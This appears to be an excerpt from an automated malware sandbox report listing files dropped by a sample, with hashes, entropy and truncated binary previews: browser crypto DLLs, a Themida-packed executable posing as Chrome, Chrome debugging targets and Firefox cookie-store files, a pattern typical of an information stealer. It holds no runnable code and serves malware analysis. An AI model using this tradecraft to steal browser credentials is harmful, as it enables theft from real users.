                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\mozglue.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):608080
                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\msvcp140.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):450024
                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\nss3.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2046288
                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\softokn3.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):257872
                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\vcruntime140.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):80880
                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\chrome_131[1].exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8707480
                                                                                                                                            Entropy (8bit):7.929778234534272
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:196608:50ipMncd0lHU0kioa09gMC1tFKCnuvoMTQybYD+AvBjtO7:5VpBdxRej7nuPTH25tO
                                                                                                                                            MD5:D9A5E741B1F67593422BFB1A165288BB
                                                                                                                                            SHA1:0BC42E46E97FBF3B0754D26D88E43945EDC31A0B
                                                                                                                                            SHA-256:C81A924446D324B3AEB0772DFD9CBED34FB878AFF823BA2888362A22F7328FE8
                                                                                                                                            SHA-512:5A463B581C18E2A2076BBF888EE838745EB8FEA6E718B5882951E18A213F530589CB5CF3D61E2CC4014556DC65A327B56B42B915BD9CEA488ADB4782AF151EA4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...Cb#g.........."...........l................@.............................`......-.....`.................................................B0n.d....Pn.H....................P..............................(@n.(................................................... .........o.................. ..` .*... ..:....t..............@..@ ..l..P..`.Q.................@... ......m.......R.............@..@ ......m.......R.............@..@ ......n.......R.............@... P.....n.n.....R.............@..@ x.... n.i.....R.............@..B.imports.....0n...... R.............@....tls.........@n......"R..................rsrc........Pn......$R.............@..@.themida..W..`n......(R.............`....boot....l2......l2..(R.............`..`.reloc.......P.........................@........................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):685392
                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):608080
                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):450024
                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2046288
                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):257872
                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):80880
                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1787
                                                                                                                                            Entropy (8bit):5.365163133680912
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:SfNaoQ+S7PTEQ+sfNaoQy7Q3fNaoQjVQufNaoQ0DJ0UrU0U8QF:6NnQ5TEQHNnQy7QvNnQjVQWNnQaJ0Uru
                                                                                                                                            MD5:C7F84D1611418DDFB656D85D38A78EEA
                                                                                                                                            SHA1:E5B6789E7B7E08685647D902348FC00575EF5B23
                                                                                                                                            SHA-256:359EEC4271EAB5C1B42FD17C343E92CC20B7B8DC5BFA345AFC7A6F442A16EB96
                                                                                                                                            SHA-512:2F9BD15B09F354EF948FDFADE7699C457C30BB39D7739F6EBD42263B3A640365F6F44A10721188E6E5E5A9596984BFE2707CED6FCF7B06CDD23A57868E414B1B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/F9667712244C775F3876FD8A72AA48E5",.. "id": "F9667712244C775F3876FD8A72AA48E5",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/F9667712244C775F3876FD8A72AA48E5"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/D91DFC7D0F919200CBEAE0752006B4CF",.. "id": "D91DFC7D0F919200CBEAE0752006B4CF",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/D91DFC7D0F919200CBEAE0752006B4CF"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64
                                                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                                                            MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                                                            SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                                                            SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                                                            SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@...e.................................&..............@..........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cbnwij54.lep.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1mgxww1.rlc.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrw1ekzs.ysi.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nliojnjl.zy1.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32768
                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32768
                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
